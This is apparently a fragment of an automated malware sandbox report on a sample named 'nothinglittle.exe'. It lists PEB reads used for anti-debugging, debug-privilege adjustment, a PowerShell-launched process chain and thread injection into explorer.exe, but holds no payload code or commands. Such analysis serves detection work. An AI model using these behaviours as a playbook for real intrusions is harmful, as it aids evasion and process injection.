Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AE760 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AE760 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01341751 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128A745 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01307794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01307794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01307794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01298794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B37EB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B37EB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B37EB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B37EB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B37EB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B37EB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B37EB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A97ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A97ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A97ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A97ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A97ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A97ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A97ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BD7CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BD7CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013417D2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013587CF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129B62E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129B62E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B7620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B7620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B7620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B7620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B7620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B7620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128A63B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128A63B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01305623 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01305623 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01305623 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01305623 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01305623 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01305623 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01305623 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01305623 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01305623 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BC63D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01281618 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01341608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A4670 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A4670 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A4670 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A4670 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01316652 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013456B6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013456B6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012886A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013046A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012976E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B06C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B06C0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B06C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B06C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B06C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B06C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B06C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B06C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B06C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B06C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B06C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B06C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B06C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01358966 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134E962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01341951 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128395E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128395E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013449A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013449A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013449A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013449A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BC9BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BC9BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013069A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B99BC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013589E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013419D8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012999C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012999C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012999C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012999C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01286800 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01286800 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01286800 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AF86D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01341843 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012928AE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012928AE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012928AE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012928AE mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012928AE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012928AE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01283880 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01283880 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01303884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01303884 mov eax, dword ptr fs:[00000030h]

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\Public\Documents\nothinglittle.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Process token adjusted: Debug

Source: C:\Users\Public\Documents\nothinglittle.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe

Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe

Thread register set: target process: 3388

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\Documents\nothinglittle.exe C:\Users\Public\Documents\nothinglittle.exe
Source: C:\Users\Public\Documents\nothinglittle.exe	Process created: C:\Users\user\AppData\Local\Temp\nothinglittle.exe C:\Users\user\AppData\Local\Temp\nothinglittle.exe

Source: explorer.exe, 0000001D.00000000.438472962.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 0000001D.00000000.439042458.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001D.00000000.439042458.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001D.00000000.439042458.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
